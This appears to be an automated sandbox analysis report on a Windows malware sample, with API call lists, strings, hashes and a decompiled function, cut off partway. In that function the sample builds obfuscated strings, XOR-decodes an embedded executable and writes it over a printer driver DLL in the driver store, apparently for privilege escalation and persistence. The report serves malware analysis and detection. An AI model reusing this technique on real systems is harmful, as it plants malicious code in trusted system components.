0x0041294f
0x0041294f
0x0041294f
0x0041296f
0x00412997
0x00412997
0x00412971
0x00412971
0x00412977
0x00000000
0x00412979
0x00412979
0x0041297f
0x00000000
0x00412981
0x0041298f
0x0041298f
0x0041297f
0x00412977
0x00412999
0x0041299e
0x004129a4
0x004129ad
0x004129ad
0x004129be
0x00412563
0x00412563
0x0041256b
0x00412597
0x00412598
0x0041259d
0x00000000
0x0041256d
0x00412570
0x00000000
0x00412576
0x00412576
0x0041257b
0x00000000
0x00412581
0x00412581
0x00412586
0x00000000
0x0041258c
0x0041258f
0x00000000
0x00412595
0x00412595
0x00000000
0x00412595
0x0041258f
0x00412586
0x0041257b
0x00412570
0x0041256b
0x00412253
0x00412253
0x00412253
0x00412253
0x0041225b
0x004122c4
0x004122c6
0x0041231c
0x0041231c
0x0041231e
0x00412320
0x00000000
0x00412320
0x00000000
0x004122c8
0x004122cc
0x004122cf
0x00000000
0x004122d1
0x004122d6
0x004122d9
0x00000000
0x004122df
0x004122df
0x004122e5
0x004122e6
0x004122f0
0x004122f6
0x004122f9
0x004122fb
0x004122ff
0x00412304
0x00412308
0x0041230c
0x00412310
0x00412314
0x00412318
0x00000000
0x00412318
0x004122d9
0x004122cf
0x00412261
0x00412261
0x00412265
0x004122bb
0x004122bd
0x004122bf
0x00412323
0x00412323
0x00412323
0x00000000
0x00412270
0x00412278
0x004129c4
0x004129c4
0x004129c9
0x004129ce
0x004129ce
0x004129d3
0x004129d3
0x004129d8
0x004129d8
0x004129dd
0x004129dd
0x004129e2
0x004129e3
0x004129e4
0x004129e5
0x004129e6
0x004129e7
0x004129e8
0x004129e9
0x004129ea
0x004129eb
0x004129ec
0x004129ed
0x004129ee
0x004129ef
0x004129f0
0x004129f6
0x004129fd
0x004129ff
0x00412a04
0x00412a04
0x00412a0a
0x00412a0a
0x00412a0f
0x00412a14
0x00412a1c
0x00412a1d
0x00412a21
0x00412a29
0x00412a2a
0x00412a2c
0x00412a2e
0x00412a30
0x00412a35
0x00412a37
0x00412a39
0x00412a47
0x00412a4d
0x00412a4d
0x00412a3b
0x00412a3b
0x00412a3b
0x00412a53
0x00412a5b
0x00412a5d
0x00412a64
0x00412a66
0x00412a75
0x00412a7a
0x00412a7a
0x00412a64
0x00412a7d
0x00412a83
0x00412a88
0x00412a8e
0x00412a94
0x00412ab3
0x00412ab3
0x00412ab8
0x00412a96
0x00412a96
0x00412aa0
0x00412aac
0x00412aac
0x00412abd
0x00412ac5
0x00412acb
0x00412ad0
0x00412ad1
0x00412ad9
0x00412ade
0x00412ae3
0x00412ae8
0x00412aed
0x00412af3
0x00412af6
0x00412af8
0x00412b07
0x00412b0c
0x00412b12
0x00412b1f
0x00412b23
0x00412b28
0x00412b2c
0x00412b32
0x00412b38
0x00412b3a
0x00412b47
0x00412b4b
0x00412b52
0x00412b56
0x00412b5e
0x00412b69
0x00412b71
0x00412b77
0x00412b86
0x00412b88
0x00412b8c
0x00412b8e
0x00412b90
0x00412b90
0x00412b90
0x00412ba8
0x00412bb7
0x00412bdb
0x00412be1
0x00412be3
0x00412bfe
0x00412c03
0x00412c0d
0x00412c12
0x00412c17
0x00412c2e
0x00412c45
0x00412c47
0x00412c60
0x00412c6f
0x00412c71
0x00412c71
0x00412c73
0x00412c7b
0x00412c7b
0x00412c8d
0x00412c93
0x00412c99
0x00412c9c
0x00412ca9
0x00412cb0
0x00412cbe
0x00412cc7
0x00412cd7
0x00412ce9
0x00412cf4
0x00412cfc
0x00412cfe
0x00412d0a
0x00412d25
0x00412d25
0x00412d28
0x00412d2d
0x00412d33
0x00412d38
0x00412d38
0x00412d3d
0x00412d3f
0x00412d3f
0x00412d48
0x00412d4f
0x00412d58
0x00412d5a
0x00412d5d
0x00412d5d
0x00412d63
0x00412d6c
0x0041227e
0x0041227e
0x00412295
0x0041229a
0x0041229e
0x004122a3
0x004122a7
0x004122ab
0x004122af
0x004122b3
0x004122b7
0x00000000
0x004122b7
0x00412278
0x00412265
0x00000000
0x00412325
0x00412325
0x00412329
0x0041232a
0x0041232b
0x0041232f
0x00412333
0x00000000
0x00412253
0x0041224d
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000003), ref: 00411DEF
GetProcessHeap.KERNEL32(?,00000003), ref: 00411DF7
CreateEventA.KERNEL32(00000000,00000000,00000000,grot,?,00000003), ref: 00411E3D
GetCursorPos.USER32(?), ref: 00411E48
GetCursorPos.USER32(?), ref: 00411E97
GetFileSize.KERNEL32(00000000,00000000), ref: 00411F2A
CreateFileW.KERNEL32(wav,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00411F4B
HeapAlloc.KERNEL32(?,00000000,00000000), ref: 00411F5B
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00411F7D
waveOutOpen.WINMM(?,000000FF,?,?,00000000,00050000), ref: 00411FB6
waveOutMessage.WINMM(?,9119DDE3,00000002,00000000), ref: 00411FE8
HeapAlloc.KERNEL32(?,00000008,00000020), ref: 00412008
WaitForSingleObject.KERNEL32(?,00000BB6), ref: 00412041
CloseHandle.KERNEL32(00000000), ref: 00412048
waveOutPrepareHeader.WINMM(?,00000000,00000020), ref: 0041207B
waveOutWrite.WINMM(?,00000000,00000020), ref: 00412092
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004120B3
waveOutClose.WINMM(?), ref: 004120BD
IsDlgButtonChecked.USER32 ref: 00412135
GetDlgItem.USER32(00000000,?), ref: 00412152
SetWindowTextA.USER32(00000000), ref: 00412159
new.LIBCMT ref: 0041218C

Part of subcall function 0041500C: Concurrency::cancel_current_task.LIBCPMT ref: 0041502B

Part of subcall function 00413000: Concurrency::cancel_current_task.LIBCPMT ref: 00413084
Part of subcall function 00413000: new.LIBCMT ref: 0041308A
Part of subcall function 00413000: new.LIBCMT ref: 004130A7

KillTimer.USER32(00000002,00000000), ref: 0041234A
GetActiveWindow.USER32 ref: 0041241B
MessageBoxA.USER32(00000000), ref: 00412422
MonitorFromWindow.USER32(00000000), ref: 00412448
MonitorFromRect.USER32(?,00000002), ref: 004124D3
GetMonitorInfoA.USER32(00000000,?), ref: 004124ED
CoCreateInstance.OLE32(00437D90,00000000,00000017,00437D80,?), ref: 004125E7
GetCurrentObject.GDI32(00000001,00000006), ref: 004125FE
GetTextAlign.GDI32(00000001), ref: 0041260B
SetTextAlign.GDI32(00000001,00000000), ref: 00412625
MoveToEx.GDI32(00000001,?,?,?), ref: 00412639
TextOutW.GDI32(00000001,00000000,00000000,?,?), ref: 004126B4
SelectObject.GDI32(00000001,?), ref: 004126DA
TextOutW.GDI32(00000001,00000000,00000000,?,?), ref: 004126ED
SelectObject.GDI32(00000001,?), ref: 004126F4
TextOutW.GDI32(00000001,00000000,00000000,?,00000000), ref: 00412720
SetTextAlign.GDI32(00000001,?), ref: 00412738
MoveToEx.GDI32(00000001,?,?,00000000), ref: 00412749
BeginPaint.USER32(00000000,?), ref: 0041275E
CreatePen.GDI32(00000000,00000001,00000000), ref: 0041276C
SelectObject.GDI32(00000000,00000000), ref: 00412778
MoveToEx.GDI32(00000000,00000032,00000082,00000000), ref: 00412784
LineTo.GDI32(00000000,000000FA,00000082), ref: 0041279B
MoveToEx.GDI32(00000000,00000096,000000E6,00000000), ref: 004127AA
LineTo.GDI32(00000000,00000096,0000001E), ref: 004127B8
SetPixel.GDI32(00000000,00000000,00000082,00000000), ref: 004127E5
DeleteObject.GDI32(?), ref: 0041280D
EndPaint.USER32(00000000,?), ref: 00412822
BeginPaint.USER32(00000000,?), ref: 00412833
CreatePen.GDI32(00000000,00000003,00FF0000), ref: 00412844
SelectObject.GDI32(00000000,00000000), ref: 0041284C
Polyline.GDI32(00000000,?,00000004), ref: 00412871
EndPaint.USER32(00000000,?), ref: 00412880
ScriptStringAnalyse.USP10(00000001,?,00000000,000000FF,000000A0,7FFFFFFF,00000000,00000000,00000000,00000000,00000000,?), ref: 004128C0
ScriptStringOut.USP10(00000001,9119DDE3,0000076E,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,000000FF,000000A0,7FFFFFFF,00000000,00000000), ref: 004128D9
ScriptStringFree.USP10(00000000,00000001,9119DDE3,0000076E,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,000000FF,000000A0,7FFFFFFF,00000000), ref: 004128E3
LoadMenuA.USER32(?,0044CB60), ref: 0041290E
GetDC.USER32(00000000), ref: 00412988
EnumFontsA.GDI32(00000000), ref: 0041298F

Part of subcall function 004136FB: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00413707
Part of subcall function 004136FB: __CxxThrowException@8.LIBVCRUNTIME ref: 00413715

Part of subcall function 004132E0: new.LIBCMT ref: 00413335

Strings

grot, xrefs: 00411E0C
vector<T> too long, xrefs: 004129C4
wav, xrefs: 00411F46
Application, xrefs: 00412416
(, xrefs: 004124E0
Error, xrefs: 00412411

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Object$Text$Create$wave$MovePaintSelect$AlignFileHeapMonitorScriptStringWindow$AllocBeginCloseConcurrency::cancel_current_taskCursorEventFromLineMessageSingleWait$ActiveAnalyseButtonCheckedCurrentDeleteEnumException@8FontsFreeHandleHeaderInfoInstanceItemKillLoadMenuOpenPixelPolylinePrepareProcessReadRectSizeThrowTimerWritestd::invalid_argument::invalid_argument
String ID: ($Application$Error$grot$vector<T> too long$wav
API String ID: 1906150408-871641287
Opcode ID: 9e3502523d967837649dc84a5ffee68ba78475273857c59559544398333e0cdf
Instruction ID: 4205c629f0ee1e7e0e1aceca22913185fa7f661727b8ee9aa3cce7b92cd80bdf
Opcode Fuzzy Hash: 9e3502523d967837649dc84a5ffee68ba78475273857c59559544398333e0cdf
Instruction Fuzzy Hash: 1772BAB56083049FC324DF28DD84B6ABBF5FB89704F04592EF981D72A0DB74A845CB5A

Uniqueness

Uniqueness Score: 100.00%

Function 0040EC32, Relevance: 62.3, APIs: 30, Strings: 5, Instructions: 1063
stringlibraryfileUNIQUE

Download Yara Rule

C-Code - Quality: 76%

			E0040EC32() {
				void* _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				char _v28;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				signed int _v68;
				signed int _v72;
				long _v76;
				struct _SECURITY_ATTRIBUTES* _v80;
				intOrPtr _v86;
				short _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				short _v108;
				short _v110;
				short _v112;
				short _v114;
				short _v116;
				short _v118;
				short _v120;
				short _v122;
				short _v124;
				short _v126;
				short _v128;
				short _v130;
				short _v132;
				short _v134;
				short _v136;
				short _v138;
				char _v140;
				intOrPtr _v146;
				short _v148;
				short _v150;
				short _v152;
				short _v154;
				short _v156;
				short _v158;
				short _v160;
				short _v162;
				char _v164;
				intOrPtr _v168;
				short _v170;
				short _v172;
				short _v174;
				short _v176;
				short _v178;
				short _v180;
				short _v182;
				short _v184;
				short _v186;
				short _v188;
				short _v190;
				char _v192;
				intOrPtr _v198;
				short _v200;
				short _v202;
				short _v204;
				short _v206;
				short _v208;
				short _v210;
				short _v212;
				short _v214;
				short _v216;
				short _v218;
				short _v220;
				short _v222;
				short _v224;
				short _v226;
				short _v228;
				short _v230;
				short _v232;
				intOrPtr _v238;
				short _v240;
				short _v242;
				short _v244;
				short _v246;
				short _v248;
				short _v250;
				short _v252;
				short _v254;
				short _v256;
				short _v258;
				short _v260;
				short _v262;
				short _v264;
				short _v266;
				short _v268;
				short _v270;
				short _v272;
				short _v274;
				short _v276;
				intOrPtr _v282;
				short _v284;
				short _v286;
				short _v288;
				short _v290;
				short _v292;
				short _v294;
				short _v296;
				short _v298;
				short _v300;
				intOrPtr _v306;
				short _v308;
				short _v310;
				short _v312;
				short _v314;
				short _v316;
				short _v318;
				short _v320;
				short _v322;
				short _v324;
				short _v326;
				short _v328;
				short _v330;
				short _v332;
				short _v334;
				short _v336;
				short _v338;
				short _v340;
				short _v342;
				short _v344;
				short _v346;
				short _v348;
				intOrPtr _v352;
				short _v354;
				short _v356;
				short _v358;
				short _v360;
				short _v362;
				short _v364;
				short _v366;
				short _v368;
				short _v370;
				short _v372;
				short _v374;
				short _v376;
				short _v378;
				short _v380;
				short _v382;
				short _v384;
				short _v386;
				short _v388;
				short _v390;
				short _v392;
				short _v394;
				short _v396;
				intOrPtr _v402;
				short _v404;
				short _v406;
				short _v408;
				short _v410;
				short _v412;
				short _v414;
				short _v416;
				short _v418;
				short _v420;
				short _v422;
				char _v424;
				struct _SECURITY_ATTRIBUTES* _v428;
				short _v430;
				short _v432;
				short _v434;
				short _v436;
				short _v438;
				short _v440;
				short _v442;
				short _v444;
				short _v446;
				short _v448;
				short _v450;
				short _v452;
				WCHAR* _v458;
				short _v460;
				short _v462;
				short _v464;
				short _v466;
				short _v468;
				short _v470;
				short _v472;
				short _v474;
				short _v476;
				short _v478;
				short _v480;
				short _v482;
				short _v484;
				short _v486;
				short _v488;
				short _v490;
				short _v492;
				short _v494;
				short _v496;
				short _v498;
				short _v500;
				short _v502;
				short _v504;
				short _v506;
				short _v508;
				short _v510;
				short _v512;
				short _v514;
				short _v516;
				intOrPtr _v522;
				short _v524;
				short _v526;
				short _v528;
				short _v530;
				short _v532;
				short _v534;
				short _v536;
				short _v538;
				short _v540;
				short _v542;
				short _v544;
				short _v546;
				short _v548;
				short _v550;
				short _v552;
				short _v554;
				short _v556;
				short _v558;
				short _v560;
				short _v562;
				short _v564;
				short _v566;
				short _v568;
				short _v570;
				short _v572;
				short _v574;
				short _v576;
				short _v578;
				char _v580;
				long _v584;
				char _v588;
				char _v592;
				WCHAR* _v596;
				intOrPtr _v868;
				char _v872;
				short _v1420;
				char _v1464;
				void* __ebx;
				short _t356;
				short _t357;
				short _t358;
				short _t359;
				short _t360;
				short _t361;
				short _t362;
				short _t363;
				short _t364;
				short _t365;
				struct HINSTANCE__* _t368;
				WCHAR* _t369;
				WCHAR* _t371;
				intOrPtr* _t372;
				WCHAR* _t376;
				signed int _t377;
				short _t378;
				short _t379;
				short _t380;
				short _t381;
				short _t382;
				short _t383;
				short _t384;
				short _t385;
				short _t386;
				short _t387;
				short _t388;
				char _t392;
				short _t393;
				short _t394;
				struct HINSTANCE__* _t397;
				void* _t399;
				_Unknown_base(*)()* _t400;
				WCHAR* _t402;
				short _t403;
				short _t404;
				short _t405;
				short _t406;
				short _t407;
				short _t408;
				short _t409;
				short _t410;
				short _t411;
				short _t412;
				short _t413;
				short _t414;
				short _t415;
				int _t417;
				int _t419;
				WCHAR* _t421;
				intOrPtr* _t428;
				WCHAR* _t431;
				short _t433;
				short _t434;
				short _t435;
				short _t436;
				short _t437;
				short _t438;
				short _t439;
				short _t440;
				short _t441;
				short _t442;
				short _t443;
				short _t444;
				short _t445;
				int _t447;
				int _t449;
				int _t451;
				WCHAR* _t452;
				WCHAR* _t454;
				short _t460;
				short _t461;
				short _t462;
				short _t463;
				short _t464;
				short _t465;
				short _t466;
				short _t467;
				short _t468;
				short _t469;
				short _t470;
				short _t471;
				short _t472;
				short _t473;
				long _t480;
				WCHAR* _t484;
				WCHAR* _t486;
				void* _t487;
				void _t488;
				short _t489;
				short _t492;
				void* _t496;
				void* _t499;
				void* _t502;
				intOrPtr* _t503;
				void* _t504;
				short _t505;
				short _t506;
				short _t507;
				short _t508;
				short _t509;
				short _t510;
				short _t511;
				short _t512;
				short _t513;
				short _t514;
				short _t515;
				short _t516;
				short _t517;
				short _t518;
				short _t519;
				short _t520;
				short _t522;
				short _t523;
				short _t524;
				short _t525;
				short _t526;
				short _t527;
				short _t528;
				short _t529;
				intOrPtr _t540;
				short _t548;
				short _t549;
				short _t550;
				short _t551;
				short _t552;
				short _t553;
				short _t554;
				short _t555;
				short _t556;
				short _t557;
				short _t558;
				short _t559;
				int _t561;
				int _t563;
				WCHAR* _t565;
				intOrPtr* _t572;
				WCHAR* _t577;
				short _t579;
				short _t580;
				short _t581;
				short _t582;
				short _t583;
				short _t584;
				short _t585;
				short _t586;
				short _t587;
				short _t588;
				short _t589;
				short _t590;
				int _t592;
				int _t594;
				char _t599;
				void* _t601;
				short _t602;
				long _t603;
				long _t604;
				char _t606;
				char _t607;
				char _t608;
				char _t609;
				char _t610;
				char _t611;
				char _t612;
				char _t613;
				short _t620;
				short _t621;
				short _t622;
				short _t623;
				char _t626;
				char _t627;
				char _t628;
				char _t629;
				short _t630;
				short _t634;
				short _t641;
				short _t642;
				short _t644;
				short _t645;
				short _t651;
				short _t652;
				short _t653;
				short _t657;
				short _t664;
				short _t665;
				char _t667;
				char _t668;
				short _t669;
				short _t670;
				short _t671;
				short _t672;
				short _t673;
				short _t674;
				short _t675;
				short _t676;
				short _t677;
				short _t678;
				short _t679;
				WCHAR* _t680;
				short _t681;
				short _t682;
				WCHAR* _t684;
				short _t686;
				WCHAR* _t687;
				void* _t688;
				void* _t689;
				void* _t690;
				signed int _t691;
				short _t692;
				short _t693;
				short _t694;
				short _t695;
				short _t696;
				short _t697;
				short _t698;
				short _t699;
				short _t701;
				WCHAR* _t705;
				short _t706;
				WCHAR* _t710;
				WCHAR* _t714;
				short _t715;
				short _t716;
				void* _t719;
				intOrPtr* _t720;

				_t356 = 0x58;
				_v452 = _t356;
				_t357 = 0x70;
				_v450 = _t357;
				_t358 = 0x73;
				_v448 = _t358;
				_t359 = 0x50;
				_v446 = _t359;
				_t360 = 0x72;
				_v444 = _t360;
				_t361 = 0x69;
				_v442 = _t361;
				_t362 = 0x6e;
				_t599 = 0x74;
				_v440 = _t362;
				_t363 = 0x2e;
				_v436 = _t363;
				_t364 = 0x64;
				_v434 = _t364;
				_t365 = 0x6c;
				_v432 = _t365;
				_v430 = _t365;
				_v428 = 0;
				_v438 = _t599;
				_t368 = LoadLibraryW( &_v452);
				if(_t368 != 0) {
					_t606 = 0x53;
					_v64 = _t606;
					_t607 = 0x61;
					_v62 = _t607;
					_t608 = 0x72;
					_t667 = 0x70;
					_v61 = _t608;
					_v55 = _t608;
					_v58 = _t667;
					_t668 = 0x73;
					_t609 = 0x69;
					_v54 = _t609;
					_t610 = 0x6e;
					_v53 = _t610;
					_t611 = 0x4a;
					_v51 = _t611;
					_t612 = 0x6f;
					_v50 = _t612;
					_t613 = 0x62;
					_v49 = _t613;
					_v63 = _t599;
					_v60 = _t599;
					_v52 = _t599;
					_v59 = 0x58;
					_v57 = _t668;
					_v56 = 0x50;
					_v48 = 0;
					_t369 = GetProcAddress(_t368,  &_v64);
					_v596 = _t369;
					__eflags = _t369;
					if(_t369 == 0) {
						goto L1;
					}
					_t371 = E0040EB60(0);
					__eflags = _t371;
					if(_t371 == 0) {
						goto L1;
					}
					_t372 = E004010BB(0, 1, 0x49a1375c);
					_t691 =  *_t372(0, 0, _t690);
					__eflags = _t691;
					if(_t691 != 0) {
						_t684 = E0040C6BA(4 + _t691 * 2);
						__eflags = _t684;
						if(_t684 != 0) {
							_t376 = E0040E69E(_t684, _t691);
							_push(_t684);
							__eflags = _t376;
							if(_t376 != 0) {
								_t601 = lstrlenW;
								_t377 = lstrlenW(??);
								_t692 = 0x5c;
								__eflags =  *((intOrPtr*)(_t684 + _t377 * 2 - 2)) - _t692;
								if( *((intOrPtr*)(_t684 + _t377 * 2 - 2)) != _t692) {
									_t684[lstrlenW(_t684)] = _t692;
								}
								_t378 = 0x44;
								_t669 = 0x72;
								_v140 = _t378;
								_t379 = 0x69;
								_v136 = _t379;
								_t380 = 0x76;
								_v134 = _t380;
								_t381 = 0x65;
								_v132 = _t381;
								_t382 = 0x53;
								_t620 = 0x74;
								_v128 = _t382;
								_t383 = 0x6f;
								_v124 = _t383;
								_t384 = 0x65;
								_v120 = _t384;
								_t385 = 0x46;
								_v116 = _t385;
								_t386 = 0x69;
								_v118 = _t692;
								_t693 = 0x6c;
								_v112 = _t693;
								_t694 = 0x65;
								_v126 = _t620;
								_t621 = 0x52;
								_v110 = _t694;
								_v106 = _t694;
								_t695 = 0x70;
								_v104 = _t695;
								_t696 = 0x6f;
								_v102 = _t696;
								_t697 = 0x73;
								_v108 = _t621;
								_t622 = 0x74;
								_v114 = _t386;
								_v98 = _t386;
								_t387 = 0x6f;
								_v94 = _t387;
								_t388 = 0x79;
								_v100 = _t697;
								_t698 = 0x5c;
								_v88 = _t698;
								_t699 = 0x25;
								_v96 = _t622;
								_t623 = 0x77;
								_v138 = _t669;
								_v130 = _t669;
								_v122 = _t669;
								_v92 = _t669;
								_v90 = _t388;
								_t670 = 0x73;
								_v86 = 0;
								_v164 = _t699;
								_v162 = _t623;
								_v160 = _t670;
								_v158 = _t699;
								_v152 = _t699;
								_v192 = _t699;
								_v186 = _t699;
								_v180 = _t699;
								_v174 = _t699;
								_v146 = 0;
								_v168 = 0;
								_v156 = _t623;
								_v154 = _t670;
								_v150 = _t623;
								_v148 = _t670;
								_v190 = _t623;
								_v188 = _t670;
								_v184 = _t623;
								_v182 = _t670;
								_v178 = _t623;
								_v176 = _t670;
								_v172 = _t623;
								_v170 = _t670;
								E0040C437( &_v872, 0x114);
								_t392 = 0x52;
								_v44 = _t392;
								_t393 = 0x74;
								_t671 = 0x6c;
								_t626 = 0x65;
								_v40 = _t626;
								_v37 = _t626;
								_t627 = 0x73;
								_v35 = _t627;
								_t628 = 0x69;
								_v34 = _t628;
								_t629 = 0x6f;
								_v33 = _t629;
								_t630 = 0x6e;
								_v43 = _t393;
								_v39 = _t393;
								_v298 = _t393;
								_t394 = 0x64;
								_v296 = _t394;
								_v288 = _t394;
								_v872 = 0x114;
								_t701 = 0x2e;
								_v282 = 0;
								_v42 = _t671;
								_v41 = 0x47;
								_v38 = 0x56;
								_v36 = 0x72;
								_v32 = _t630;
								_v31 = 0;
								_v300 = _t630;
								_v294 = _t671;
								_v292 = _t671;
								_v290 = _t701;
								_v286 = _t671;
								_v284 = _t671;
								_t397 = GetModuleHandleW( &_v300);
								__eflags = _t397;
								if(_t397 == 0) {
									L44:
									_push(_t684);
									L45:
									E0040C6D1();
									L46:
									goto L47;
								} else {
									_t400 = GetProcAddress(_t397,  &_v44);
									 *_t400( &_v872);
									__eflags = _v868 - 0xa;
									if(_v868 != 0xa) {
										goto L44;
									}
									_t402 = E00410679();
									__eflags = _t402;
									_t403 = 0x70;
									_push(0x72);
									if(_t402 == 0) {
										_v232 = _t403;
										_pop(_t404);
										_t634 = 0x6e;
										_v230 = _t404;
										_t405 = 0x6d;
										_v226 = _t405;
										_t406 = 0x73;
										_v224 = _t406;
										_t407 = 0x30;
										_v222 = _t407;
										_v220 = _t407;
										_t408 = 0x33;
										_v218 = _t408;
										_t409 = 0x69;
										_v214 = _t409;
										_t410 = 0x66;
										_v210 = _t410;
										_t411 = 0x5f;
										_v208 = _t411;
										_t412 = 0x78;
										_v206 = _t412;
										_t413 = 0x38;
										_v204 = _t413;
										_t414 = 0x36;
										_v202 = _t414;
										_t415 = 0x2a;
										_v200 = _t415;
										_v228 = _t634;
										_v216 = _t701;
										_v212 = _t634;
										_v198 = 0;
										_t417 = lstrlenW(_t684);
										_t419 = lstrlenW( &_v232);
										_push( &_v232);
										_t421 =  &_v140;
										_push(_t421);
										_t705 = E0040BEA4( &_v164, lstrlenW(_t421) + _t417 + _t419, 3, _t684);
										_t720 = _t719 + 0x18;
										__eflags = _t705;
										if(_t705 == 0) {
											L16:
											_push(_t684);
											goto L9;
										}
										_t428 = E004010BB(_t601, 1, 0x32432452);
										_v8 =  *_t428(_t705,  &_v1464);
										E0040C6D1(_t705);
										_t431 = _v8;
										__eflags = _t431;
										if(_t431 == 0) {
											goto L16;
										}
										E00407F69(_t431);
										_t641 = 0x5c;
										_t433 = 0x49;
										_v346 = _t433;
										_t434 = 0x33;
										_v344 = _t434;
										_t435 = 0x38;
										_v342 = _t435;
										_t436 = 0x36;
										_v340 = _t436;
										_t437 = 0x50;
										_v336 = _t437;
										_t438 = 0x72;
										_t672 = 0x69;
										_v334 = _t438;
										_v348 = _t641;
										_v338 = _t641;
										_t642 = 0x6e;
										_t439 = 0x74;
										_v328 = _t439;
										_t440 = 0x43;
										_v326 = _t440;
										_t441 = 0x6f;
										_v324 = _t441;
										_t442 = 0x66;
										_v320 = _t442;
										_t443 = 0x67;
										_v316 = _t443;
										_t444 = 0x2e;
										_v314 = _t444;
										_t445 = 0x64;
										_t706 = 0x6c;
										_v312 = _t445;
										_v332 = _t672;
										_v330 = _t642;
										_v322 = _t642;
										_v318 = _t672;
										_v310 = _t706;
										_v308 = _t706;
										_v306 = 0;
										_t447 = lstrlenW(_t684);
										_t449 = lstrlenW( &_v348);
										_t451 = lstrlenW( &_v1420);
										_t709 = _t447 + _t449 + _t451;
										__eflags = _t447 + _t449 + _t451;
										_t452 =  &_v348;
										L22:
										_push(_t452);
										_push( &_v1420);
										_t454 =  &_v140;
										_push(_t454);
										_t710 = E0040BEA4( &_v192, _t709 + lstrlenW(_t454), 4, _t684);
										E0040C6D1(_t684);
										__eflags = _t710;
										if(_t710 == 0) {
											goto L7;
										}
										_t673 = 0x25;
										_t460 = 0x57;
										_t644 = 0x49;
										_v514 = _t460;
										_t461 = 0x4e;
										_v510 = _t461;
										_t462 = 0x44;
										_v508 = _t462;
										_t463 = 0x52;
										_v504 = _t463;
										_t464 = 0x5c;
										_v516 = _t673;
										_v502 = _t673;
										_t674 = 0x74;
										_t686 = 0x61;
										_t602 = 0x73;
										_v500 = _t464;
										_v488 = _t464;
										_v512 = _t644;
										_v506 = _t644;
										_t645 = 0x6b;
										_t465 = 0x55;
										_v486 = _t465;
										_t466 = 0x70;
										_v484 = _t466;
										_t467 = 0x64;
										_v482 = _t467;
										_t468 = 0x65;
										_v476 = _t468;
										_t469 = 0x54;
										_v474 = _t469;
										_t470 = 0x2e;
										_v466 = _t470;
										_t471 = 0x6a;
										_v464 = _t471;
										_t472 = 0x6f;
										_v462 = _t472;
										_t473 = 0x62;
										_v460 = _t473;
										_v458 = 0;
										_v498 = _t674;
										_v496 = _t686;
										_v494 = _t602;
										_v492 = _t645;
										_v490 = _t602;
										_v480 = _t686;
										_v478 = _t674;
										_v472 = _t686;
										_v470 = _t602;
										_v468 = _t645;
										_t603 = ExpandEnvironmentStringsW( &_v516, 0, 0);
										__eflags = _t603;
										if(_t603 != 0) {
											_t687 = E0040C6BA(2 + _t603 * 2);
											__eflags = _t687;
											if(_t687 == 0) {
												goto L24;
											}
											_t480 = ExpandEnvironmentStringsW( &_v516, _t687, _t603);
											__eflags = _t480;
											if(_t480 != 0) {
												_v72 = _v72 & 0x00000000;
												__eflags = E00410679();
												if(__eflags != 0) {
													E0041071A( &_v72);
												}
												E004100EF(__eflags, _t687, _t710);
												E0040C6D1(_t687);
												_t484 = E00410679();
												__eflags = _t484;
												if(_t484 != 0) {
													E00410A5F( &_v72);
												}
												E0040FB82();
												_t486 = E00410679();
												__eflags = _t486;
												if(_t486 == 0) {
													_t688 = 0x417e18;
													_t604 = 0x1a00;
												} else {
													_t688 = 0x416018;
													_t604 = 0x1e00;
												}
												_t487 = 0;
												__eflags = 0;
												do {
													 *(_t487 + _t688) =  *(_t487 + _t688) ^ 0x00000018;
													_t487 = _t487 + 1;
													__eflags = _t487 - _t604;
												} while (__eflags < 0);
												_t488 = 0x4d;
												 *_t688 = _t488;
												_t489 = 0x41;
												_v28 = _t489;
												_v26 = _t489;
												_v24 = _t489;
												_v22 = _t489;
												_v20 = _t489;
												_v18 = _t489;
												_v16 = _t489;
												_v14 = _t489;
												_v12 = _t489;
												_v10 = _t489;
												 *((char*)(_t688 + 1)) = 0x5a;
												E0040F9F0(__eflags, _t688, _t604,  &_v28, 0x14,  *0x4198f4);
												_t492 = 0x42;
												_v28 = _t492;
												_v26 = _t492;
												_v24 = _t492;
												_v22 = _t492;
												_v20 = _t492;
												_v18 = _t492;
												_v16 = _t492;
												_v14 = _t492;
												_v12 = _t492;
												_v10 = _t492;
												E0040F9F0(__eflags, _t688, _t604,  &_v28, 0x14, 0x4119ec);
												__eflags = 0;
												_v584 = 0;
												_v76 = 0;
												while(1) {
													_t496 = CreateFileW(_t710, 0x40000000, 0, 0, 3, 0x80, 0);
													_v8 = _t496;
													WriteFile(_t496, _t688, _t604,  &_v584, 0);
													__eflags = _v8 - 0xffffffff;
													if(_v8 != 0xffffffff) {
														break;
													}
													Sleep(0x3e8);
													_t540 = _v76 + 1;
													_push(0);
													_v76 = _t540;
													__eflags = _t540 - 5;
													_pop(0);
													if(_t540 < 5) {
														continue;
													}
													break;
												}
												E0040C6D1(_t710);
												_t499 = _v8;
												__eflags = _t499 - 0xffffffff;
												if(_t499 == 0xffffffff) {
													goto L7;
												}
												CloseHandle(_t499);
												__imp__CoInitialize(0);
												_v588 = 0;
												__imp__CoCreateInstance(0x4119cc, 0, 1, 0x4119dc,  &_v588);
